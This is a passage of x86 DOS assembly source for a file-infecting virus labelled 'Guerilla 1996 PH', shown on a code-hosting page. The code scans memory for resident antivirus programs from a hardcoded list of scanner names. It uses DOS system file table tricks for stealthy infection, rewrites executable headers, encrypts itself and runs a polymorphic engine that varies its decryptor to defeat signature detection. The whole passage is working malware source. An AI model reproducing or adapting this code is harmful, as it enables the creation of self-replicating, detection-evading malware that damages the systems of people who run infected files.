📄 guerilla.asm
字号:
mov ah, 52h ; undocumented
call simint21h ; -> ES:BX
push es:[bx-2]
pop ds
checkanotherMCB:
cmp byte ptr ds:[di], 'M'
jz searchMCB
cmp byte ptr ds:[di], 'Z'
jnz av_isnt_resident
searchMCB:
lea si, [bp+avtable1] ; addr[avtable1]
mov cx, numberavmem ; number of AV checks
avloop: mov ax, word ptr ds:[di+8]
cmp ax, word ptr cs:[si] ;
jnz chkmav
mov al, byte ptr cs:[si+2]
cmp al, byte ptr ds:[di+10]
jz av_is_resident
cmp al, '*' ; is wild card?
jz av_is_resident ; then found one
chkmav: add si, 3
loop avloop ; loop numberavmem times
mov ax, ds
add ax, ds:[di+3] ; goto next MCB
inc ax
mov ds, ax
jmp short checkanotherMCB
av_isnt_resident:
av_is_resident:
pop ds
pop es
ret
; -----------------------------------------------------------------------
; Get the sft
; -----------------------------------------------------------------------
; entry BX=file handle
; return ES:DI=SFT
;
sft:
push bx
mov ax, 1220h
int 2fh
xor bx, bx
mov bl, es:[di]
mov ax, 1216h
int 2fh
mov word ptr es:[di+2], 2
pop bx
ret
;--------------------------------------------------------------------------
; Check Drive letter
;--------------------------------------------------------------------------
; return CF=0 = not floppy
; return CF=1 = floppy
checkdrive:
mov ah, 19h
call simint21h
cmp al, 2
ret
;--------------------------------------------------------------------------
; Check marker #2
;--------------------------------------------------------------------------
checkmarker:
; return ZF=1 = marker #2 set
; return ZF=0 = marker #2 not set
mov ax, word ptr es:[di+0dh]
and ax, 011111b
xor ax, 000101b
ret
;--------------------------------------------------------------------------
; Read header (1ch bytes)
;--------------------------------------------------------------------------
; entry dx = addr[header]
readheader:
mov ah, 3fh
mov cx, 1ch
call simint21h
mov si, dx
ret
;--------------------------------------------------------------------------
; Write header (18h bytes)
;--------------------------------------------------------------------------
; entry dx = addr[header]
writeheader:
mov ah, 40h
mov cx, 18h
call simint21h
ret
;--------------------------------------------------------------------------
; Get files minutes value
;--------------------------------------------------------------------------
; return cx=minutes
getmins:
mov cx, word ptr es:[di+0dh]
shr cx, 1
shr cx, 1
shr cx, 1
shr cx, 1
shr cx, 1
and cx, 0111111b
ret
;--------------------------------------------------------------------------
; Encrypt/Decrypt header (18h bytes)
;--------------------------------------------------------------------------
decryptheader:
encryptheader:
push di
mov ah, byte ptr [time]
lea di, [origheader]
mov cx, 18h
h_loop: mov al, [di]
xor al, ah
mov [di], al
inc di
loop h_loop
pop di
ret
;--------------------------------------------------------------------------
; Move SFT file pointer to top of file
;--------------------------------------------------------------------------
movepointertotop:
mov word ptr es:[di+15h], 0
mov word ptr es:[di+17h], 0
ret
;--------------------------------------------------------------------------
; Polymorphic routine
;--------------------------------------------------------------------------
; entry di = addr[destination]
; si = addr[table of opcodes to use]
; bx = # of possible instruction variations (max 3)
polymorph:
push es
push ds
push ax
push cx
push bx
push si
push di
push cs
pop ds
push cs
pop es
mov ax, polykey ;
xor ax, di ; gives each file a unique
; polymorphic virus pattern that
; does not change
trymore:
shr ax, 1
mov cx, ax
and cx, 3
cmp cx, bx ; bx = # of possible instruction
jge trymore ; variations
mov ax, cx
mov cx, 4 ; 4 opcode length
mul cl
add si, ax
mov cx, 5 ; 4 opcode length
jmp jumploop
db 0eah
genloop: mov al, cs:[si]
mov cs:[di], al
inc di
inc si
jumploop: loop genloop
pop di
pop si
pop bx
pop cx
pop ax
pop ds
pop es
ret
cctable db 0f8h,0f8h,0f8h,90h,0bh,0c0h,90h,90h,83h,0c8h,00h,90h
movsibptable db 55h,5eh,0f8h,0f8h,8bh,0f5h,0bh,0c0h,8bh,0f5h,0bh,0d2h
jumpctable db 90h,90h,72h,02h,73h,02h,0ebh,02h
adddisitable db 90h,03h,0feh,90h,0f8h,13h,0feh,0f8h,90h,0f8h,03h,0feh
incditable db 47h,4fh,47h,90h,4fh,47h,90h,47h,83h,0c7h,01h,90h
decedxtable db 90h,90h,66h,4ah,66h,83h,0eah,01h
oredxedxtable db 66h,0bh,0d2h,90h,66h,23h,0d2h,90h,66h,83h,0fah,00h
subbxbxtable db 2bh,0dbh,2bh,0dbh,0bbh,00h,00h,90h,90h,83h,0e3h,00h
movax305table db 0b4h,3h,0b0h,05h,0b9h,05h,03h,91h,0b0h,05h,0b4h,3h
jumpztable db 74h,02h,0ebh,0e8h,75h,0eah,90h,90h
movdi14table db 0b8h,14h,00h,97h,0bfh,14h,00h,90h,90h,0bfh,14h,00h
db 25h,90h
virusname db ' Guerilla 1996 PH '
rep_input db '$'
stealthon db 1
numberconditions equ 11
numberavmem equ 3
avtable1 db 'TB*' ; TB*
db 'NAV' ; NA* NAVSTR
db 'NEM' ; NE* NEMESIS
numberav equ 13
avtable2: dw 'BT' ; TB* TBSCAN
dw 'IV' ; VI* VIRSTOP
dw 'VA' ; AV* AVP
dw 'AN' ; NA* NAVSTR
dw 'EN' ; NE* NEMESIS
dw 'SV' ; VS* VSHIELD OR VSAFE
dw 'IF' ; FI* FINDVIRU
dw '-F' ; F-* F-PROT
dw 'MI' ; IM* IM
dw 'VF' ; FV* FV386
dw 'CS' ; SC* SCAN
dw 'BQ' ; QB* QBASIC
dw 'VI' ; IV* IV
;------------------------------------------------------------------------
; encrypt/decrypt subroutine #2
;------------------------------------------------------------------------
encrypt_decrypt2:
db 0b0h ; mov al, XXh
crypt2: db 0h
jc encryptit2
decryptit2:
mov byte ptr cs:[si+addorsub], 02ah ; sub
jmp short findaddr
encryptit2:
mov byte ptr cs:[si+addorsub], 02h ; add
findaddr: mov di, offset testit
add di, si
mov cx, offset (encrypt_decrypt2-testit)
jmp patch2
db 0eah
loop2:
mov ah, cs:[di]
addorsub: db 02h ; add ah,al or sub ah,al
scratch2: db 0e0h
mov cs:[di], ah
inc di
patch2: loop loop2
ret
messup:
push ax
push cx
xor si, si
stc
call encrypt_decrypt2
stc
call encrypt_decrypt
; -----------------------------------------------------------------------
; ENCRYPTION STOPS HERE
; -----------------------------------------------------------------------
outitend:
pop cx
pop ax
call simint21h
clearcarry2: nop
nop
nop
nop
call encrypt_decrypt
clearcarry3: nop
nop
nop
nop
call encrypt_decrypt2
ret
;------------------------------------------------------------------------
; encrypt/decrypt subroutine #1
;------------------------------------------------------------------------
.386
encrypt_decrypt:
db 0b1h ; mov cl, XXh
crypt: db 0h
jumpc: db 90h
db 90h
db 90h ; jc encryptit
db 90h
db 0b1h ; mov cl, XXh
rotdecrypt: db 0h
encryptit:
movdi14:
mov di, 14h
nop
adddisi: add di, si
nop
nop
mov edx, offset (outitend-outit+1)
jmp short patch1
db 0eah
loop1:
db 2eh
db 8ah
alorah1: db 25h
db 0d2h ; ror ah,cl
scratch: db 0cch
db 2eh
db 88h
alorah2: db 25h
incdi: inc di
nop
nop
nop
patch1:
decedx: dec edx
nop
nop
oredxedx: cmp edx, 0
jumpz:
db 75h ; jnz loop1
db 0eah ;
db 90h
db 90h
cryptret:
ret
;--------------------------------------------------------------------------
; Original int 21h routine
;--------------------------------------------------------------------------
simint21h: ; Simulate interrupt 21h
pushf ; call ssss:oooo
callfar db 9ah ;
int21off dw ? ; Offset of interrupt 21h
int21seg dw ? ; Segment of interrupt 21h
ret ;
origheader db 18h dup (?) ; read buffer
time dw 0
date dw 0
heap:
sftes dw 0
sftdi dw 0
sizems dw 0
sizels dw 0
polykey dw 0
header db 1ch dup (?) ; read buffer
endheap: ; end
seg_a ends
end startvirus
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -